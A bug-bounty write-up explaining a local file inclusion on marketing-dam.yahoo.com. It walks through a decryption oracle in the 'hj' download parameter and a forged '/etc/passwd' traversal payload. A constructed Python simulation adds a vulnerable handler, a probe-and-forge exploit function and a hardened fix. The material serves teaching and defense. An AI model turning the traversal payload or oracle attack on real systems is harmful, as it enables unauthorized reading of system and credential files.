Local File Include on marketing-dam.yahoo.com
RedShark1802 gives a good description of the bug in the ticket summary section, so much of this will be a reiteration and an attempt to break it down further.
The URL that RedShark1802 starts to play with looks like this in its native form:
With the URL encoding removed
The hj parameter is the vulnerable one: it specifies the file to download by passing the file name in encrypted form.
Any string passed in via hj was decrypted by the server, and the resulting plaintext was reflected in the file download prompt (the filename the browser offers to save). That turns the endpoint into a decryption oracle: RedShark1802 could submit arbitrary strings such as "aaaaaaaaaa" as if they were ciphertext, observe what each one decrypted to, and from those observations work out the ciphertext he needed to send for the plaintext he wanted. An oracle like this makes the encryption moot, because the attacker never needs the key; the server does the decryption for him. Eventually he was able to turn the payload
/../../../../../../../../etc/passwd into its accepted form
/../../../../../../../../79d/zGcIwd and collect himself a cool $2500.
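The oracle technique above, as an added worked example in Python. This is not the author's or RedShark1802's code, and it is not the real marketing-dam.yahoo.com application. The page does not say what cipher the site used; the example assumes a Vigenère-style shift over letters and digits that passes punctuation through unchanged, chosen only because the final payload keeps the slashes and dots of the traversal intact. The key, download directory, file names and file contents are all constructed. It shows the vulnerable download handler reflecting the decrypted name, a chosen-ciphertext probe recovering the per-position shift, the forged hj for the /etc/passwd payload, and a hardened handler that authenticates the token and confines the path.

```python
import hashlib
import hmac
import os
import string
from urllib.parse import quote, unquote

# Assumed cipher (not the real marketing-dam.yahoo.com scheme): a Vigenere-style
# shift over letters and digits; any other character, such as the '/' and '.' of
# a path, passes through unchanged.
ALPHABET = string.ascii_letters + string.digits
SECRET_KEY = "s3cr3tK3y"             # hypothetical server-side key, unknown to the attacker
BASE_DIR = "/var/www/dam/downloads"  # hypothetical download root
HMAC_KEY = b"hypothetical-mac-key"   # used only by the hardened handler

# Constructed stand-in for the filesystem.
FILES = {
    BASE_DIR + "/brochure.pdf": b"%PDF-1.4 constructed brochure",
    "/etc/passwd": b"root:x:0:0:root:/root:/bin/bash\n",
}


def _shift(text, key, direction):
    out = []
    for i, ch in enumerate(text):
        if ch in ALPHABET:
            k = ALPHABET.index(key[i % len(key)])
            out.append(ALPHABET[(ALPHABET.index(ch) + direction * k) % len(ALPHABET)])
        else:
            out.append(ch)
    return "".join(out)


def encrypt(plaintext, key=SECRET_KEY):
    return _shift(plaintext, key, +1)


def decrypt(ciphertext, key=SECRET_KEY):
    return _shift(ciphertext, key, -1)


def vulnerable_download(hj):
    """Decrypts hj, reflects the plaintext in the download prompt and serves it.
    Returns (status, headers, body) like a minimal HTTP response."""
    name = decrypt(unquote(hj))
    headers = {"Content-Disposition": f'attachment; filename="{name}"'}
    path = os.path.normpath(BASE_DIR + name)   # plain concatenation, no containment check
    body = FILES.get(path)
    return (200, headers, body) if body is not None else (404, headers, b"")


def recover_shifts(oracle, length, probe_char="a"):
    """Chosen-ciphertext probe: send a run of one character as if it were
    ciphertext, read back what it decrypted to, and derive the shift at each
    position. Returns None when nothing is reflected (no oracle)."""
    _, headers, _ = oracle(quote(probe_char * length))
    disp = headers.get("Content-Disposition", "")
    if 'filename="' not in disp:
        return None
    plain = disp.split('filename="', 1)[1].rstrip('"')
    c = ALPHABET.index(probe_char)
    return [(c - ALPHABET.index(p)) % len(ALPHABET) for p in plain]


def forge(target, shifts):
    """Apply the recovered shifts so the server decrypts the result to `target`."""
    out = []
    for i, ch in enumerate(target):
        if ch in ALPHABET:
            out.append(ALPHABET[(ALPHABET.index(ch) + shifts[i]) % len(ALPHABET)])
        else:
            out.append(ch)
    return "".join(out)


def exploit(oracle, target="/../../../../../../../../etc/passwd"):
    """Probe, forge, fetch. Returns the oracle's response, or None if the
    endpoint does not reflect the decrypted value."""
    shifts = recover_shifts(oracle, len(target))
    if shifts is None:
        return None
    return oracle(quote(forge(target, shifts)))


def sign(token):
    return token + "." + hmac.new(HMAC_KEY, token.encode(), hashlib.sha256).hexdigest()


def hardened_download(hj):
    """Two independent fixes: reject tokens the server did not issue, and refuse
    any decrypted name that canonicalizes outside BASE_DIR."""
    token, _, tag = unquote(hj).rpartition(".")
    if not hmac.compare_digest(sign(token).encode(), (token + "." + tag).encode()):
        return 403, {}, b""
    path = os.path.normpath(BASE_DIR + decrypt(token))   # use os.path.realpath on a real filesystem
    if os.path.commonpath([BASE_DIR, path]) != BASE_DIR:
        return 403, {}, b""
    body = FILES.get(path)
    if body is None:
        return 404, {}, b""
    return 200, {"Content-Disposition": f'attachment; filename="{os.path.basename(path)}"'}, body
```

The probe only needs to be as long as the payload: one request of 35 "a" characters reveals every shift the forged string needs, and the attacker never learns the key. Against the hardened handler the probe gets no reflected filename, so there is no oracle to work with, and even a token that somehow carried a valid tag would be refused once the decrypted path leaves the download root.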